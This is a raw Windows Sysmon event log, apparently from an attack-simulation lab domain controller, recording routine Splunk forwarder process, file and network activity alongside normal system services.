Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203808Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:02.212{5ABCFE62-E9FE-6040-5A4E-00000000AD01}6212C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002203836Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:03.852{5ABCFE62-842D-603E-0B00-00000000AD01}6321072C:\Windows\system32\lsass.exe{5ABCFE62-8423-603E-0100-00000000AD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000002203835Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:03.727{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=427726CAED33045AB5924A5B5C143D25,SHA256=B0D06D79717E768F720BE50515629CBA09436A83A6452DCE91D0891EC251EBB5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203834Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:03.555{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E9FF-6040-5C4E-00000000AD01}2336C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203833Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:03.555{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203832Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:03.555{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203831Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:03.555{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203830Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:03.555{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203829Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:03.555{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E9FF-6040-5C4E-00000000AD01}2336C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203828Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:03.555{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E9FF-6040-5C4E-00000000AD01}2336C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203827Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:03.556{5ABCFE62-E9FF-6040-5C4E-00000000AD01}2336C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002203826Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:03.227{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45BAFBD4AB1028E65D7EB3143CAC9D77,SHA256=14EA359233060DF7B68FD86B5A18999A835133AE2813A6742AEEEF157D741DB2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203842Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:01.588{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-228.attackrange.local60734-false10.0.1.14win-dc-228.attackrange.local389ldap 354300x80000000000000002203841Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:01.588{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60734-false10.0.1.14win-dc-228.attackrange.local389ldap 354300x80000000000000002203840Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:01.582{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60733-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 354300x80000000000000002203839Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:01.582{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60733-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 23542300x80000000000000002203838Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:04.727{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96E530C15FC679B2B987C2347A436AA5,SHA256=9604217DEE2767F116AE7EBCEFA87C790EBE7823C9A21C19A3A4F3641E97A907,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203837Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:04.555{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=847718BB52A7D41DE11909AEE1952430,SHA256=28EAC642567E19FB687BD0333227506932AEBB3C72D1AD3FC6D986E65BC48C88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203845Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:05.743{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=475B4156A227C6EB01800B40F3FC3059,SHA256=853698F18F3FCB3DBEF3072B585C60ABA1F41C822ED85A6AC3E35E2D7BB8C3B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203844Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:01.692{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60735-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local445microsoft-ds 354300x80000000000000002203843Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:01.692{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60735-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local445microsoft-ds 23542300x80000000000000002203848Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:06.977{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203847Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:06.743{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09DA536C4508172526F47FD51EC02E69,SHA256=1EEFBB2AA55C63B2E261E1CA84A96C4937AEEEC1E02E16BD504330768FD44789,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203846Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:06.477{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=944F77ADDD5E0E0F034FDAE15CC08553,SHA256=B1C3B29229CA97160C78382930FC94ABE6AC23DF6C4A9D0CCD40F34168DBF470,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203851Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:07.977{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CD33B299A73C7801A81B66FF5CE7084,SHA256=C9B54D6C2615FC2FEDD80B4422DA548A44F1B8AB5C3A62E95AF46E3D38785842,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203850Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:07.759{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C22CE76CD15D405018C8A7CCFA8D6534,SHA256=B50275596CB6413DA16DFA60DA8EDB55757E65D1CB2591E2F50C437913D304E3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203849Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:03.079{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60736-false10.0.1.12-8000- 23542300x80000000000000002203852Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:08.759{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC2B95471B7D4F12EDC4EB11AAC3D7AF,SHA256=41D2DFF7DBFF337A8FC87B4C6ED770F5FC18F30837AE4482F7834B5BB4283E48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203854Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:09.774{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=274DFCD2F8087667E03F5224CB51D2EE,SHA256=7CAF0BDA06C3C711D9F14B588D0BE52EF92BF8FEC41BB32E8CE9DDCD47ECF6A7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203853Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:04.798{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60737-false10.0.1.12-8089- 23542300x80000000000000002203855Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:10.790{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0B6813B32D9A6DED15B503647BDA29D,SHA256=D0B7AE9D74C40AFF3349C8D7A7566615B1DA1FFE1A369033970507226BB770E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203856Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:11.790{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB2FFAD03DC8BB1F9E05781BE1C324CB,SHA256=0336C8482BD754455687F2384F69273D54DCFF71C489440A259BABB4ED84A78B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203858Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:12.790{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=177CFEFA5DFF92FD9DEF13EAF1A4BE17,SHA256=C552546E8829D426B2C3EBF5230EF0350235DF1782BA022C7D21B9044D64829B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203857Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:12.134{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F15D203CE4C6F49DF3A0169FD4AEB5F7,SHA256=7603DFFE7500A52CD6E863794BC037C961FE43D55F1BA309330CA00CEB75D8E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203860Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:13.790{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=335814299296B2D6B3BF3A2040E4EC95,SHA256=E6569EB96865AEF1B20547391FEEA80AEE5C0AE27CE4C4FDA21C734A8063EE62,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203859Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:08.907{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60738-false10.0.1.12-8000- 23542300x80000000000000002203861Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:14.805{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D625783D1E866D495D799CFE1062BED1,SHA256=7538713773C333236246FCFDEA5D98DC3036150BB25F0E4638154ED3AB55F57D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203863Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:15.821{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7561FC3D63741596A75634E134DE80A9,SHA256=CB1DCBD45EC3A798E598CACABCBDF5E68CC7D519EE8E121316606FF21299EAB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203862Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:15.821{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B99A834B47E93646B8926F5BF784BE2,SHA256=DA1DA3ABCB1FF113C5BB7254F9FD946B1770ADA0D1A81F817F0CF0C54C1E0BAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203864Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:16.821{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F37320A1D558D7DC67B5748550D63327,SHA256=F45BD7A7FE121690F0C7B669546C1D0B7CDC06F7B3F16B24E840F3ED2BCC471B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203876Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:17.837{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3BB77E92191AA962F653897593665AA,SHA256=D78CA44874C988C6304CC6527DF4A8CD5283796C905EF631C68084C622BB582A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203875Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:13.954{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60739-false10.0.1.12-8000- 10341000x80000000000000002203874Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:17.602{5ABCFE62-EA0D-6040-5D4E-00000000AD01}66526572C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 